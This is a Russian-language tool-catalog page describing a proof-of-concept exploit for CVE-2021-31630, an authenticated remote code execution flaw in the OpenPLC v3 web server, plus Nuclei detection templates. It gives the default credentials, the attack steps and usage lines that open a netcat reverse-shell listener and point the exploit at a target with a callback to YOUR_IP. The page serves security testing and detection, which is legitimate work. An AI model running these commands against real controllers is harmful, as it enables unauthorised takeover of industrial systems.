Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
OpenPLC-CVE-2021-31630-RCE — Концептуальный эксплойт для Python 3.13+ для CVE-2021-31630, обеспечивающий аутентифицированное удаленное выполнение кода на OpenPLC v3 через вредоносную загрузку аппаратного уровня. Включает шаблоны обнаружения Nuclei для проверки учетных данных по умолчанию и уязвимостей. | Kitploit
Инструменты/GitHubGitHub/machevalia/openplc-cve-2021-31630-rce
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеРазработка Полезной Нагрузки
GitHubmachevalia/openplc-cve-2021-31630-rce

OpenPLC-CVE-2021-31630-RCE

Концептуальный эксплойт для Python 3.13+ для CVE-2021-31630, обеспечивающий аутентифицированное удаленное выполнение кода на OpenPLC v3 через вредоносную загрузку аппаратного уровня. Включает шаблоны обнаружения Nuclei для проверки учетных данных по умолчанию и уязвимостей.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
321 год назадЕщё не проверено

OpenPLC v3 Аутентифицированное RCE (CVE-2021-31630)

Это современный эксплойт Proof-of-Concept, совместимый с Python 3.13+, для CVE-2021-31630 — уязвимости в OpenPLC v3, которая позволяет аутентифицированному пользователю загрузить собственный аппаратный слой, содержащий вредоносный код, что приводит к удаленному выполнению кода (RCE) на хосте.

Первоначальное обнаружение уязвимости и уведомление — Fellipe Oliveira. Эта повторная реализация и модернизация использует httpx, инструменты командной строки, журналирование и более безопасные методы обнаружения.

Обзор эксплойта

  • Уязвимость: CVE-2021-31630
  • Компонент: веб-сервер OpenPLC v3
  • Воздействие: аутентифицированное удаленное выполнение кода
  • Учетные данные по умолчанию: openplc:openplc

Порядок эксплуатации

  1. Выполните вход, используя действительные учетные данные
  2. Загрузите вредоносный C-код в качестве собственного аппаратного слоя
  3. Запустите компиляцию
  4. Запустите выполнение (опционально)
  5. Получите подключение обратной оболочки

Использование

  1. Запустите слушатель:
root@kitploit:~
nc -lvnp 9001
  1. Запустите эксплойт:
root@kitploit:~
python3 openplc_rce.py http://target:8080 -lh YOUR_IP -lp 9001

Опциональные флаги:

  • -u Имя пользователя (по умолчанию: openplc)
  • -p Пароль (по умолчанию: openplc)
  • -t Таймаут в секундах (по умолчанию: 20)

Возможности

  • Совместим с Python 3.13+
  • Создан с помощью httpx
  • Поддержка журналирования для чистого вывода
  • Модульные функции для упрощения повторного использования
  • Включены шаблоны обнаружения Nuclei

Шаблоны обнаружения Nuclei

  1. Проверка учетных данных по умолчанию
root@kitploit:~
nuclei -t nuclei-templates/openplc-default-login.yaml -u http://target:8080
  1. Пассивная проверка уязвимости RCE
root@kitploit:~
nuclei -t nuclei-templates/openplc-authenticated-rce-check.yaml -u http://target:8080

Второй шаблон выполняет вход и пытается загрузить безвредную полезную нагрузку + компиляцию, чтобы подтвердить вероятную уязвимость — без запуска фактического выполнения кода.

Включенные файлы

  • OpenPLC_CVE_2021_31630.py – эксплойт для Python 3.13+
  • nuclei-templates/openplc-default-login.yaml – обнаружение учетных данных по умолчанию
  • nuclei-templates/openplc-authenticated-rce-check.yaml – безопасное обнаружение уязвимого поведения

⚠️ Юридические / этические аспекты

Этот код предназначен только для образовательного и авторизованного тестирования безопасности. Не используйте без явного разрешения владельца системы.

Скачать инструмент